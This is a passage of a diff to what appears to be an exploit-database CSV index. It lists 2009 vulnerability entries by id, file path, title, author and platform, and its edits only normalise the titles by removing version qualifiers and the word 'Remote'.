Injection",2009-01-11,EcHoLL,php,webapps,0 7719,platforms/php/webapps/7719.txt,"Fast Guest Book (Auth Bypass) SQL Injection",2009-01-11,Moudi,php,webapps,0 7720,platforms/windows/dos/7720.pl,"Microsoft Windows - (.CHM) Denial of Service (html compiled)",2009-01-11,securfrog,windows,dos,0 7721,platforms/windows/dos/7721.pl,"Browse3D 3.5 - (.sfs) Local Buffer Overflow PoC",2009-01-11,Houssamix,windows,dos,0 -7722,platforms/php/webapps/7722.txt,"DZcms 3.1 - (products.php pcat) Remote SQL Injection",2009-01-11,"Glafkos Charalambous ",php,webapps,0 +7722,platforms/php/webapps/7722.txt,"DZcms 3.1 - (products.php pcat) SQL Injection",2009-01-11,"Glafkos Charalambous ",php,webapps,0 7723,platforms/php/webapps/7723.txt,"Seo4SMF for SMF forums - Multiple Vulnerabilities",2009-01-11,WHK,php,webapps,0 -7724,platforms/php/webapps/7724.php,"phpMDJ <= 1.0.3 - (id_animateur) Blind SQL Injection Exploit",2009-01-11,darkjoker,php,webapps,0 +7724,platforms/php/webapps/7724.php,"phpMDJ 1.0.3 - (id_animateur) Blind SQL Injection Exploit",2009-01-11,darkjoker,php,webapps,0 7725,platforms/php/webapps/7725.txt,"XOOPS Module tadbook2 - (open_book.php book_sn) SQL Injection",2009-01-11,stylextra,php,webapps,0 7726,platforms/php/webapps/7726.txt,"BKWorks ProPHP 0.50b1 - (Auth Bypass) SQL Injection",2009-01-11,SirGod,php,webapps,0 -7727,platforms/windows/local/7727.pl,"Microsoft HTML Workshop <= 4.74 - Universal Buffer Overflow Exploit",2009-01-12,SkD,windows,local,0 +7727,platforms/windows/local/7727.pl,"Microsoft HTML Workshop 4.74 - Universal Buffer Overflow Exploit",2009-01-12,SkD,windows,local,0 7728,platforms/php/webapps/7728.txt,"Weight Loss Recipe Book 3.1 - (Auth Bypass) SQL Injection",2009-01-11,x0r,php,webapps,0 7729,platforms/php/webapps/7729.txt,"PHP-Fusion Mod the_kroax (comment_id) SQL Injection",2009-01-11,FasTWORM,php,webapps,0 7730,platforms/php/webapps/7730.txt,"Social Engine (browse_classifieds.php s) SQL Injection",2009-01-11,snakespc,php,webapps,0 -7731,platforms/php/webapps/7731.txt,"fttss <= 2.0 - Remote Command Execution",2009-01-11,dun,php,webapps,0 +7731,platforms/php/webapps/7731.txt,"fttss 2.0 - Remote Command Execution",2009-01-11,dun,php,webapps,0 7732,platforms/php/webapps/7732.php,"Silentum Uploader 1.4.0 - Remote File Deletion Exploit",2009-01-11,"Danny Moules",php,webapps,0 7733,platforms/php/webapps/7733.txt,"Photobase 1.2 - (language) Local File Inclusion",2009-01-11,Osirys,php,webapps,0 7734,platforms/php/webapps/7734.txt,"Joomla Component Portfol (vcatid) SQL Injection",2009-01-12,H!tm@N,php,webapps,0 -7735,platforms/php/webapps/7735.pl,"Simple Machines Forum <= 1.0.13 / <= 1.1.5 - 'Destroyer 0.1' Password Reset Security Bypass",2009-01-12,Xianur0,php,webapps,0 -7736,platforms/asp/webapps/7736.htm,"Comersus Shopping Cart <= 6.0 - Remote User Pass Exploit",2009-01-12,ajann,asp,webapps,0 +7735,platforms/php/webapps/7735.pl,"Simple Machines Forum 1.0.13 / <= 1.1.5 - 'Destroyer 0.1' Password Reset Security Bypass",2009-01-12,Xianur0,php,webapps,0 +7736,platforms/asp/webapps/7736.htm,"Comersus Shopping Cart 6.0 - Remote User Pass Exploit",2009-01-12,ajann,asp,webapps,0 7737,platforms/windows/dos/7737.py,"Triologic Media Player 7 - (.m3u) Local Heap Buffer Overflow PoC",2009-01-12,zAx,windows,dos,0 -7738,platforms/php/webapps/7738.txt,"WordPress Plugin WP-Forum 1.7.8 - Remote SQL Injection",2009-01-12,seomafia,php,webapps,0 +7738,platforms/php/webapps/7738.txt,"WordPress Plugin WP-Forum 1.7.8 - SQL Injection",2009-01-12,seomafia,php,webapps,0 7739,platforms/windows/remote/7739.html,"ExcelOCX ActiveX 3.2 - Download File Insecure Method Exploit",2009-01-12,"Alfons Luja",windows,remote,0 7740,platforms/php/webapps/7740.txt,"PWP Wiki Processor 1-5-1 - Remote File Upload",2009-01-12,ahmadbady,php,webapps,0 7741,platforms/asp/webapps/7741.txt,"dMx READY (25 Products) Remote Database Disclosure",2009-01-12,Cyber-Zone,asp,webapps,0 -7742,platforms/windows/dos/7742.txt,"Winamp <= 5.541 - (mp3/aiff) Multiple Denial of Service Exploits",2009-01-12,securfrog,windows,dos,0 +7742,platforms/windows/dos/7742.txt,"Winamp 5.541 - (mp3/aiff) Multiple Denial of Service Exploits",2009-01-12,securfrog,windows,dos,0 7743,platforms/php/webapps/7743.txt,"Realtor 747 - (define.php INC_DIR) Remote File Inclusion",2009-01-12,ahmadbady,php,webapps,0 7744,platforms/asp/webapps/7744.txt,"Virtual GuestBook 2.1 - Remote Database Disclosure",2009-01-13,Moudi,asp,webapps,0 7745,platforms/windows/local/7745.py,"VUPlayer 2.49 - (.asx) (Universal) Local Buffer Overflow Exploit",2009-01-13,"Encrypt3d.M!nd ",windows,local,0 @@ -7289,52 +7289,52 @@ id,file,description,date,author,platform,type,port 7749,platforms/windows/remote/7749.html,"Office Viewer ActiveX Control 3.0.1 - Remote File Execution Exploit",2009-01-13,Houssamix,windows,remote,0 7750,platforms/windows/dos/7750.html,"PowerPoint Viewer OCX 3.1 - Remote File Overwrite Exploit",2009-01-13,Stack,windows,dos,0 7751,platforms/windows/dos/7751.pl,"dBpowerAMP Audio Player 2 - (.pls) Local Buffer Overflow PoC",2009-01-13,Stack,windows,dos,0 -7752,platforms/asp/webapps/7752.txt,"DMXReady News Manager <= 1.1 - Arbitrary Category Change",2009-01-13,ajann,asp,webapps,0 +7752,platforms/asp/webapps/7752.txt,"DMXReady News Manager 1.1 - Arbitrary Category Change",2009-01-13,ajann,asp,webapps,0 7753,platforms/cgi/webapps/7753.pl,"HSPell 1.1 - (cilla.cgi) Remote Command Execution Exploit",2009-01-13,ZeN,cgi,webapps,0 -7754,platforms/asp/webapps/7754.txt,"DMXReady Account List Manager <= 1.1 Contents Change",2009-01-13,ajann,asp,webapps,0 +7754,platforms/asp/webapps/7754.txt,"DMXReady Account List Manager 1.1 Contents Change",2009-01-13,ajann,asp,webapps,0 7755,platforms/windows/remote/7755.html,"PowerPoint Viewer OCX 3.1 - Remote File Execution Exploit",2009-01-13,Cyber-Zone,windows,remote,0 7756,platforms/windows/dos/7756.py,"Nofeel FTP Server 3.6 - (CWD) Remote Memory Consumption Exploit",2009-01-13,His0k4,windows,dos,0 7757,platforms/windows/remote/7757.html,"Word Viewer OCX 3.2 - Remote File Execution Exploit",2009-01-13,Stack,windows,remote,0 -7758,platforms/php/webapps/7758.txt,"Dark Age CMS <= 0.2c Beta - (Auth Bypass) SQL Injection",2009-01-13,darkjoker,php,webapps,0 -7759,platforms/php/webapps/7759.txt,"Syzygy CMS <= 0.3 - (Auth Bypass) SQL Injection",2009-01-14,darkjoker,php,webapps,0 -7760,platforms/multiple/remote/7760.php,"TeamSpeak <= 2.0.23.17 - Remote File Disclosure",2009-01-14,c411k,multiple,remote,0 +7758,platforms/php/webapps/7758.txt,"Dark Age CMS 0.2c Beta - (Auth Bypass) SQL Injection",2009-01-13,darkjoker,php,webapps,0 +7759,platforms/php/webapps/7759.txt,"Syzygy CMS 0.3 - (Auth Bypass) SQL Injection",2009-01-14,darkjoker,php,webapps,0 +7760,platforms/multiple/remote/7760.php,"TeamSpeak 2.0.23.17 - Remote File Disclosure",2009-01-14,c411k,multiple,remote,0 7761,platforms/asp/webapps/7761.txt,"netvolution CMS 1.0 - (XSS/SQL) Multiple Vulnerabilities",2009-01-14,Ellinas,asp,webapps,0 7762,platforms/windows/remote/7762.html,"EDraw Office Viewer 5.4 - HttpDownloadFile() Insecure Method",2009-01-14,Cyber-Zone,windows,remote,0 7763,platforms/windows/remote/7763.html,"Excel Viewer OCX 3.2 - Remote File Execution Exploit",2009-01-14,Stack,windows,remote,0 -7764,platforms/php/webapps/7764.txt,"DMXReady Blog Manager <= 1.1 - Remote File Delete",2009-01-14,ajann,php,webapps,0 +7764,platforms/php/webapps/7764.txt,"DMXReady Blog Manager 1.1 - Remote File Delete",2009-01-14,ajann,php,webapps,0 7765,platforms/windows/local/7765.py,"OTSTurntables 1.00.027 - (.ofl) Local Stack Overflow Exploit",2009-01-14,suN8Hclf,windows,local,0 -7766,platforms/asp/webapps/7766.txt,"DMXReady Catalog Manager <= 1.1 - Remote Contents Change",2009-01-14,ajann,asp,webapps,0 -7767,platforms/asp/webapps/7767.txt,"DMXReady Classified Listings Manager <= 1.1 - SQL Injection",2009-01-14,ajann,asp,webapps,0 -7768,platforms/asp/webapps/7768.txt,"DMXReady Contact Us Manager <= 1.1 - Remote Contents Change",2009-01-14,ajann,asp,webapps,0 -7769,platforms/asp/webapps/7769.txt,"DMXReady Document Library Manager <= 1.1 - Contents Change",2009-01-14,ajann,asp,webapps,0 -7770,platforms/asp/webapps/7770.txt,"DMXReady Faqs Manager <= 1.1 - Remote Contents Change",2009-01-14,ajann,asp,webapps,0 -7771,platforms/asp/webapps/7771.txt,"DMXReady Job Listing <= 1.1 - Remote Contents Change",2009-01-14,ajann,asp,webapps,0 -7772,platforms/asp/webapps/7772.txt,"DMXReady Links Manager <= 1.1 - Remote Contents Change",2009-01-14,ajann,asp,webapps,0 -7773,platforms/asp/webapps/7773.txt,"DMXReady Member Directory Manager <= 1.1 - SQL Injection",2009-01-14,ajann,asp,webapps,0 -7774,platforms/asp/webapps/7774.txt,"DMXReady Members Area Manager <= 1.2 - SQL Injection",2009-01-14,ajann,asp,webapps,0 +7766,platforms/asp/webapps/7766.txt,"DMXReady Catalog Manager 1.1 - Remote Contents Change",2009-01-14,ajann,asp,webapps,0 +7767,platforms/asp/webapps/7767.txt,"DMXReady Classified Listings Manager 1.1 - SQL Injection",2009-01-14,ajann,asp,webapps,0 +7768,platforms/asp/webapps/7768.txt,"DMXReady Contact Us Manager 1.1 - Remote Contents Change",2009-01-14,ajann,asp,webapps,0 +7769,platforms/asp/webapps/7769.txt,"DMXReady Document Library Manager 1.1 - Contents Change",2009-01-14,ajann,asp,webapps,0 +7770,platforms/asp/webapps/7770.txt,"DMXReady Faqs Manager 1.1 - Remote Contents Change",2009-01-14,ajann,asp,webapps,0 +7771,platforms/asp/webapps/7771.txt,"DMXReady Job Listing 1.1 - Remote Contents Change",2009-01-14,ajann,asp,webapps,0 +7772,platforms/asp/webapps/7772.txt,"DMXReady Links Manager 1.1 - Remote Contents Change",2009-01-14,ajann,asp,webapps,0 +7773,platforms/asp/webapps/7773.txt,"DMXReady Member Directory Manager 1.1 - SQL Injection",2009-01-14,ajann,asp,webapps,0 +7774,platforms/asp/webapps/7774.txt,"DMXReady Members Area Manager 1.2 - SQL Injection",2009-01-14,ajann,asp,webapps,0 7775,platforms/php/webapps/7775.txt,"Joomla Component Camelcitydb2 2.2 - SQL Injection Vulnerabilities",2009-01-14,H!tm@N,php,webapps,0 7776,platforms/hardware/dos/7776.c,"Cisco VLAN Trunking Protocol Denial of Service Exploit",2009-01-14,showrun,hardware,dos,0 7777,platforms/php/webapps/7777.txt,"Joomla Component Fantasytournament SQL Injection Vulnerabilities",2009-01-14,H!tm@N,php,webapps,0 -7778,platforms/php/webapps/7778.txt,"phpList <= 2.10.8 - Local File Inclusion",2009-01-14,BugReport.IR,php,webapps,0 +7778,platforms/php/webapps/7778.txt,"phpList 2.10.8 - Local File Inclusion",2009-01-14,BugReport.IR,php,webapps,0 7779,platforms/windows/remote/7779.html,"AAA EasyGrid ActiveX 3.51 - Remote File Overwrite Exploit",2009-01-14,Houssamix,windows,remote,0 7780,platforms/php/webapps/7780.pl,"phosheezy 2.0 - Remote Command Execution Exploit",2009-01-14,Osirys,php,webapps,0 7781,platforms/multiple/remote/7781.txt,"Oracle Secure Backup 10g exec_qr() Command Injection",2009-01-14,"Joxean Koret",multiple,remote,0 -7782,platforms/asp/webapps/7782.txt,"DMXReady PayPal Store Manager <= 1.1 Contents Change",2009-01-14,ajann,asp,webapps,0 -7783,platforms/asp/webapps/7783.txt,"DMXReady Photo Gallery Manager <= 1.1 Contents Change",2009-01-14,ajann,asp,webapps,0 -7784,platforms/asp/webapps/7784.txt,"DMXReady Registration Manager <= 1.1 Contents Change",2009-01-14,ajann,asp,webapps,0 +7782,platforms/asp/webapps/7782.txt,"DMXReady PayPal Store Manager 1.1 Contents Change",2009-01-14,ajann,asp,webapps,0 +7783,platforms/asp/webapps/7783.txt,"DMXReady Photo Gallery Manager 1.1 Contents Change",2009-01-14,ajann,asp,webapps,0 +7784,platforms/asp/webapps/7784.txt,"DMXReady Registration Manager 1.1 Contents Change",2009-01-14,ajann,asp,webapps,0 7785,platforms/multiple/dos/7785.py,"Oracle TimesTen Remote Format String PoC",2009-01-14,"Joxean Koret",multiple,dos,0 7786,platforms/php/webapps/7786.txt,"Php Photo Album 0.8b (index.php preview) Local File Inclusion",2009-01-14,Osirys,php,webapps,0 -7787,platforms/php/webapps/7787.txt,"DMXReady Secure Document Library <= 1.1 - Remote SQL Injection",2009-01-14,ajann,php,webapps,0 -7788,platforms/asp/webapps/7788.txt,"DMXReady BillboardManager <= 1.1 Contents Change",2009-01-14,x0r,asp,webapps,0 -7789,platforms/asp/webapps/7789.txt,"DMXReady SDK <= 1.1 - Remote File Download",2009-01-14,ajann,asp,webapps,0 +7787,platforms/php/webapps/7787.txt,"DMXReady Secure Document Library 1.1 - SQL Injection",2009-01-14,ajann,php,webapps,0 +7788,platforms/asp/webapps/7788.txt,"DMXReady BillboardManager 1.1 Contents Change",2009-01-14,x0r,asp,webapps,0 +7789,platforms/asp/webapps/7789.txt,"DMXReady SDK 1.1 - Remote File Download",2009-01-14,ajann,asp,webapps,0 7790,platforms/windows/dos/7790.txt,"netsurf Web browser 1.2 - Multiple Vulnerabilities",2009-01-14,"Jeremy Brown",windows,dos,0 -7791,platforms/asp/webapps/7791.txt,"DMXReady Billboard Manager <= 1.1 - Remote File Upload",2009-01-15,ajann,asp,webapps,0 +7791,platforms/asp/webapps/7791.txt,"DMXReady Billboard Manager 1.1 - Remote File Upload",2009-01-15,ajann,asp,webapps,0 7792,platforms/php/webapps/7792.txt,"GNUBoard 4.31.03 - (08.12.29) Local File Inclusion",2009-01-15,flyh4t,php,webapps,0 7793,platforms/php/webapps/7793.php,"Joomla com_Eventing 1.6.x - BlindSQL Injection Exploit",2009-01-15,InjEctOr5,php,webapps,0 7794,platforms/windows/remote/7794.html,"Ciansoft PDFBuilderX 2.2 - ActiveX Arbitrary File Overwrite Exploit",2009-01-15,"Alfons Luja",windows,remote,0 7795,platforms/php/webapps/7795.txt,"Joomla Component RD-Autos 1.5.5 - (id) SQL Injection",2009-01-15,H!tm@N,php,webapps,0 -7796,platforms/php/webapps/7796.txt,"mkportal <= 1.2.1 - Multiple Vulnerabilities",2009-01-15,waraxe,php,webapps,0 -7797,platforms/php/webapps/7797.php,"Blue Eye CMS <= 1.0.0 - (clanek) Blind SQL Injection Exploit",2009-01-15,darkjoker,php,webapps,0 +7796,platforms/php/webapps/7796.txt,"mkportal 1.2.1 - Multiple Vulnerabilities",2009-01-15,waraxe,php,webapps,0 +7797,platforms/php/webapps/7797.php,"Blue Eye CMS 1.0.0 - (clanek) Blind SQL Injection Exploit",2009-01-15,darkjoker,php,webapps,0 7798,platforms/php/webapps/7798.txt,"Free Bible Search PHP Script (readbible.php) SQL Injection",2009-01-15,nuclear,php,webapps,0 7799,platforms/windows/dos/7799.pl,"Novell Netware 6.5 - (ICEbrowser) Remote System DoS Exploit",2009-01-16,"Jeremy Brown",windows,dos,0 7800,platforms/asp/webapps/7800.txt,"eFAQ (Auth Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0 @@ -7386,7 +7386,7 @@ id,file,description,date,author,platform,type,port 7848,platforms/windows/local/7848.pl,"Browser3D 3.5 - (.sfs) Local Stack Overflow Exploit (Perl)",2009-01-22,AlpHaNiX,windows,local,0 7849,platforms/php/webapps/7849.txt,"OwnRS Blog 1.2 - (autor.php) SQL Injection",2009-01-22,nuclear,php,webapps,0 7850,platforms/asp/webapps/7850.txt,"asp-project 1.0 Insecure Cookie Method",2009-01-22,"Khashayar Fereidani",asp,webapps,0 -7851,platforms/php/webapps/7851.php,"Pardal CMS <= 0.2.0 - Blind SQL Injection Exploit",2009-01-22,darkjoker,php,webapps,0 +7851,platforms/php/webapps/7851.php,"Pardal CMS 0.2.0 - Blind SQL Injection Exploit",2009-01-22,darkjoker,php,webapps,0 7852,platforms/windows/dos/7852.pl,"FTPShell Server 4.3 - (licence key) Remote Buffer Overflow PoC",2009-01-22,LiquidWorm,windows,dos,0 7853,platforms/windows/local/7853.pl,"EleCard MPEG PLAYER - (.m3u) Local Stack Overflow Exploit",2009-01-25,AlpHaNiX,windows,local,0 7854,platforms/windows/dos/7854.pl,"MediaMonkey 3.0.6 - (.m3u) Local Buffer Overflow PoC",2009-01-25,AlpHaNiX,windows,dos,0 @@ -7394,14 +7394,14 @@ id,file,description,date,author,platform,type,port 7856,platforms/linux/local/7856.txt,"MySQL 4/5/6 - UDF for Command Execution",2009-01-25,"Bernardo Damele",linux,local,0 7857,platforms/windows/dos/7857.pl,"Merak Media Player 3.2 m3u file Local Buffer Overflow PoC",2009-01-25,Houssamix,windows,dos,0 7858,platforms/hardware/remote/7858.php,"Siemens ADSL SL2-141 - CSRF Exploit",2009-01-25,spdr,hardware,remote,0 -7859,platforms/php/webapps/7859.pl,"MemHT Portal <= 4.0.1 - (avatar) Remote Code Execution Exploit",2009-01-25,StAkeR,php,webapps,0 +7859,platforms/php/webapps/7859.pl,"MemHT Portal 4.0.1 - (avatar) Remote Code Execution Exploit",2009-01-25,StAkeR,php,webapps,0 7860,platforms/php/webapps/7860.php,"Mambo com_sim 0.8 - Blind SQL Injection Exploit",2009-01-25,"Mehmet Ince",php,webapps,0 7861,platforms/asp/webapps/7861.txt,"Web-Calendar Lite 1.0 - (Auth Bypass) SQL Injection",2009-01-25,ByALBAYX,asp,webapps,0 7862,platforms/php/webapps/7862.txt,"Flax Article Manager 1.1 - (cat_id) SQL Injection",2009-01-25,JIKO,php,webapps,0 7863,platforms/php/webapps/7863.txt,"OpenGoo 1.1 - (script_class) Local File Inclusion",2009-01-25,fuzion,php,webapps,0 7864,platforms/php/webapps/7864.py,"EPOLL SYSTEM 3.1 - (password.dat) Disclosure Exploit",2009-01-25,Pouya_Server,php,webapps,0 7865,platforms/solaris/dos/7865.c,"SunOS Release 5.11 snv_101b - Remote IPv6 Crash Exploit",2009-01-26,kingcope,solaris,dos,0 -7866,platforms/php/webapps/7866.txt,"Simple Machines Forum <= 1.1.7 - CSRF/XSS/Package Upload",2009-01-26,Xianur0,php,webapps,0 +7866,platforms/php/webapps/7866.txt,"Simple Machines Forum 1.1.7 - CSRF/XSS/Package Upload",2009-01-26,Xianur0,php,webapps,0 7867,platforms/php/webapps/7867.php,"ITLPoll 2.7 Stable2 - (index.php id) Blind SQL Injection Exploit",2009-01-26,fuzion,php,webapps,0 7868,platforms/windows/remote/7868.html,"FlexCell Grid Control 5.6.9 - Remote File Overwrite Exploit",2009-01-26,Houssamix,windows,remote,0 7869,platforms/windows/dos/7869.html,"MW6 Barcode ActiveX (Barcode.dll) Reamote Heap Overflow PoC",2009-01-26,Houssamix,windows,dos,0 @@ -7413,37 +7413,37 @@ id,file,description,date,author,platform,type,port 7876,platforms/php/webapps/7876.php,"PHP-CMS 1 - (username) Blind SQL Injection Exploit",2009-01-26,darkjoker,php,webapps,0 7877,platforms/php/webapps/7877.txt,"Wazzum Dating Software (userid) SQL Injection",2009-01-26,nuclear,php,webapps,0 7878,platforms/php/webapps/7878.txt,"Groone's GLink Organizer (index.php cat) SQL Injection",2009-01-26,nuclear,php,webapps,0 -7879,platforms/php/webapps/7879.pl,"SiteXS <= 0.1.1 - (type) Local File Inclusion Exploit",2009-01-26,darkjoker,php,webapps,0 -7880,platforms/php/webapps/7880.txt,"ClickAuction (Auth Bypass) Remote SQL Injection",2009-01-26,R3d-D3V!L,php,webapps,0 +7879,platforms/php/webapps/7879.pl,"SiteXS 0.1.1 - (type) Local File Inclusion Exploit",2009-01-26,darkjoker,php,webapps,0 +7880,platforms/php/webapps/7880.txt,"ClickAuction (Auth Bypass) SQL Injection",2009-01-26,R3d-D3V!L,php,webapps,0 7881,platforms/php/webapps/7881.txt,"Joomla com_flashmagazinedeluxe (mag_id) SQL Injection",2009-01-26,TurkGuvenligi,php,webapps,0 7882,platforms/windows/dos/7882.html,"NCTVideoStudio ActiveX DLLs 1.6 - Remote Heap Overflow PoC",2009-01-26,Stack,windows,dos,0 7883,platforms/php/webapps/7883.txt,"OpenX 2.6.3 - (MAX_type) Local File Inclusion",2009-01-26,"Charlie Briggs",php,webapps,0 7884,platforms/php/webapps/7884.txt,"Flax Article Manager 1.1 - Remote PHP Script Upload",2009-01-27,S.W.A.T.,php,webapps,0 -7885,platforms/php/webapps/7885.txt,"Max.Blog <= 1.0.6 - (show_post.php) SQL Injection",2009-01-27,"Salvatore Fresta",php,webapps,0 +7885,platforms/php/webapps/7885.txt,"Max.Blog 1.0.6 - (show_post.php) SQL Injection",2009-01-27,"Salvatore Fresta",php,webapps,0 7886,platforms/php/webapps/7886.txt,"Pixie CMS 1.0 - Multiple Local File Inclusion Vulnerabilities",2009-01-27,DSecRG,php,webapps,0 7887,platforms/windows/dos/7887.pl,"Zinf Audio Player 2.2.1 - (.pls) Stack Overflow PoC",2009-01-27,Hakxer,windows,dos,0 7888,platforms/windows/local/7888.pl,"Zinf Audio Player 2.2.1 - (.pls) Local Buffer Overflow Exploit (univ)",2009-01-28,Houssamix,windows,local,0 7889,platforms/windows/dos/7889.pl,"Zinf Audio Player 2.2.1 - (.M3U) Local Heap Overflow PoC",2009-01-27,Hakxer,windows,dos,0 7890,platforms/windows/dos/7890.pl,"Zinf Audio Player 2.2.1 - (.gqmpeg) Buffer Overflow PoC",2009-01-27,Hakxer,windows,dos,0 -7892,platforms/php/webapps/7892.php,"Community CMS <= 0.4 - (/index.php id) Blind SQL Injection Exploit",2009-01-28,darkjoker,php,webapps,0 +7892,platforms/php/webapps/7892.php,"Community CMS 0.4 - (/index.php id) Blind SQL Injection Exploit",2009-01-28,darkjoker,php,webapps,0 7893,platforms/php/webapps/7893.txt,"gamescript 4.6 - (XSS/SQL/LFI) Multiple Vulnerabilities",2009-01-28,"Encrypt3d.M!nd ",php,webapps,0 7894,platforms/php/webapps/7894.txt,"Chipmunk Blog (Auth Bypass) Add Admin Exploit",2009-01-28,x0r,php,webapps,0 7895,platforms/php/webapps/7895.txt,"Gazelle CMS (template) Local File Inclusion",2009-01-28,fuzion,php,webapps,0 7896,platforms/php/webapps/7896.php,"Lore 1.5.6 - (article.php) Blind SQL Injection Exploit",2009-01-28,OzX,php,webapps,0 7897,platforms/php/webapps/7897.php,"phplist 2.10.x - (RCE by environ inclusion) Local File Inclusion Exploit",2009-01-28,mozi,php,webapps,0 -7898,platforms/php/webapps/7898.txt,"Max.Blog <= 1.0.6 - (submit_post.php) SQL Injection",2009-01-28,"Salvatore Fresta",php,webapps,0 -7899,platforms/php/webapps/7899.txt,"Max.Blog <= 1.0.6 - (offline_auth.php) Offline Authentication Bypass",2009-01-28,"Salvatore Fresta",php,webapps,0 +7898,platforms/php/webapps/7898.txt,"Max.Blog 1.0.6 - (submit_post.php) SQL Injection",2009-01-28,"Salvatore Fresta",php,webapps,0 +7899,platforms/php/webapps/7899.txt,"Max.Blog 1.0.6 - (offline_auth.php) Offline Authentication Bypass",2009-01-28,"Salvatore Fresta",php,webapps,0 7900,platforms/php/webapps/7900.txt,"Social Engine (category_id) SQL Injection",2009-01-28,snakespc,php,webapps,0 7901,platforms/php/webapps/7901.py,"SmartSiteCMS 1.0 - (articles.php var) Blind SQL Injection Exploit",2009-01-28,certaindeath,php,webapps,0 7902,platforms/windows/dos/7902.txt,"Amaya Web Editor XML and HTML parser Vulnerabilities",2009-01-28,"Core Security",windows,dos,0 7903,platforms/windows/remote/7903.html,"Google Chrome 1.0.154.43 - ClickJacking",2009-01-28,x0x,windows,remote,0 7904,platforms/windows/dos/7904.pl,"Thomson mp3PRO Player/Encoder - (.M3U) Crash PoC",2009-01-29,Hakxer,windows,dos,0 -7905,platforms/php/webapps/7905.pl,"Personal Site Manager <= 0.3 - Remote Command Execution Exploit",2009-01-29,darkjoker,php,webapps,0 -7906,platforms/windows/dos/7906.pl,"Amaya Web Editor <= 11.0 - Remote Buffer Overflow PoC",2009-01-29,Stack,windows,dos,0 +7905,platforms/php/webapps/7905.pl,"Personal Site Manager 0.3 - Remote Command Execution Exploit",2009-01-29,darkjoker,php,webapps,0 +7906,platforms/windows/dos/7906.pl,"Amaya Web Editor 11.0 - Remote Buffer Overflow PoC",2009-01-29,Stack,windows,dos,0 7908,platforms/php/webapps/7908.txt,"Star Articles 6.0 - (admin.manage) Remote Contents Change",2009-01-29,ByALBAYX,php,webapps,0 7909,platforms/php/webapps/7909.txt,"Coppermine Photo Gallery 1.4.19 - Remote PHP File Upload",2009-01-29,"Michael Brooks",php,webapps,0 7910,platforms/windows/remote/7910.html,"WOW Web On Windows ActiveX Control 2 - Remote Code Execution",2009-01-29,"Michael Brooks",windows,remote,0 -7911,platforms/php/webapps/7911.txt,"GLPI 0.71.3 - Multiple Remote SQL Injection VUlnerabilities",2009-01-29,Zigma,php,webapps,0 +7911,platforms/php/webapps/7911.txt,"GLPI 0.71.3 - Multiple SQL Injection VUlnerabilities",2009-01-29,Zigma,php,webapps,0 7912,platforms/windows/remote/7912.txt,"Microsoft Internet Explorer 7 - ClickJacking",2009-01-29,UzmiX,windows,remote,0 7913,platforms/windows/remote/7913.pl,"WFTPD Explorer Pro 1.0 - Remote Heap Overflow Exploit",2009-01-29,SkD,windows,remote,21 7915,platforms/hardware/remote/7915.txt,"Motorola Wimax modem CPEi300 - (FD/XSS) Multiple Vulnerabilities",2009-01-29,"Usman Saeed",hardware,remote,0 @@ -7464,7 +7464,7 @@ id,file,description,date,author,platform,type,port 7930,platforms/php/webapps/7930.txt,"bpautosales 1.0.1 - (XSS/SQL) Multiple Vulnerabilities",2009-01-30,"Mehmet Ince",php,webapps,0 7931,platforms/php/webapps/7931.txt,"Orca 2.0.2 - (Topic) Remote XSS",2009-01-30,J-Hacker,php,webapps,0 7932,platforms/php/webapps/7932.txt,"SkaLinks 1.5 - (Auth Bypass) SQL Injection",2009-01-30,Dimi4,php,webapps,0 -7933,platforms/php/webapps/7933.txt,"eVision CMS <= 2.0 - (field) SQL Injection",2009-01-30,darkjoker,php,webapps,0 +7933,platforms/php/webapps/7933.txt,"eVision CMS 2.0 - (field) SQL Injection",2009-01-30,darkjoker,php,webapps,0 7934,platforms/windows/dos/7934.py,"Spider Player 2.3.9.5 - (.asx) off by one Crash Exploit",2009-01-30,Houssamix,windows,dos,0 7935,platforms/windows/remote/7935.html,"Google Chrome 1.0.154.46 - (ChromeHTML://) Parameter Injection PoC",2009-01-30,waraxe,windows,remote,0 7936,platforms/php/webapps/7936.txt,"sma-db 0.3.12 - (RFI/XSS) Multiple Vulnerabilities",2009-02-02,ahmadbady,php,webapps,0 @@ -7475,26 +7475,26 @@ id,file,description,date,author,platform,type,port 7942,platforms/windows/dos/7942.pl,"Elecard AVC HD PLAYER - (.m3u/.xpl) Local Stack Overflow PoC",2009-02-02,AlpHaNiX,windows,dos,0 7943,platforms/windows/dos/7943.py,"RealVNC 4.1.2 - (vncviewer.exe) RFB Protocol Remote Code Execution PoC",2009-02-02,"Andres Luksenberg",windows,dos,0 7944,platforms/php/webapps/7944.php,"phpBLASTER 1.0 RC1 - (blaster_user) Blind SQL Injection Exploit",2009-02-02,darkjoker,php,webapps,0 -7945,platforms/php/webapps/7945.php,"CMS Mini <= 0.2.2 - Remote Command Execution Exploit",2009-02-02,darkjoker,php,webapps,0 +7945,platforms/php/webapps/7945.php,"CMS Mini 0.2.2 - Remote Command Execution Exploit",2009-02-02,darkjoker,php,webapps,0 7946,platforms/php/webapps/7946.txt,"sourdough 0.3.5 - Remote File Inclusion",2009-02-02,ahmadbady,php,webapps,0 7947,platforms/php/webapps/7947.pl,"eVision CMS 2.0 - Remote Code Execution Exploit",2009-02-02,Osirys,php,webapps,0 -7948,platforms/php/webapps/7948.php,"phpslash <= 0.8.1.1 - Remote Code Execution Exploit",2009-02-02,DarkFig,php,webapps,0 +7948,platforms/php/webapps/7948.php,"phpslash 0.8.1.1 - Remote Code Execution Exploit",2009-02-02,DarkFig,php,webapps,0 7949,platforms/php/webapps/7949.rb,"OpenHelpDesk 1.0.100 eval() Code Execution Exploit (Metasploit)",2009-02-02,LSO,php,webapps,0 18164,platforms/android/webapps/18164.php,"Android 'content://' URI - Multiple Information Disclosure Vulnerabilities",2011-11-28,"Thomas Cannon",android,webapps,0 7951,platforms/php/webapps/7951.txt,"WholeHogSoftware Ware Support Insecure Cookie Handling",2009-02-03,Stack,php,webapps,0 7952,platforms/php/webapps/7952.txt,"WholeHogSoftware Password Protect - Insecure Cookie Handling",2009-02-03,Stack,php,webapps,0 -7953,platforms/php/webapps/7953.txt,"ClickCart 6.0 - (Auth Bypass) Remote SQL Injection",2009-02-03,R3d-D3V!L,php,webapps,0 +7953,platforms/php/webapps/7953.txt,"ClickCart 6.0 - (Auth Bypass) SQL Injection",2009-02-03,R3d-D3V!L,php,webapps,0 7954,platforms/php/webapps/7954.txt,"groone glinks 2.1 - Remote File Inclusion",2009-02-03,"k3vin mitnick",php,webapps,0 7955,platforms/php/webapps/7955.txt,"groone's guestbook 2.0 - Remote File Inclusion",2009-02-03,"k3vin mitnick",php,webapps,0 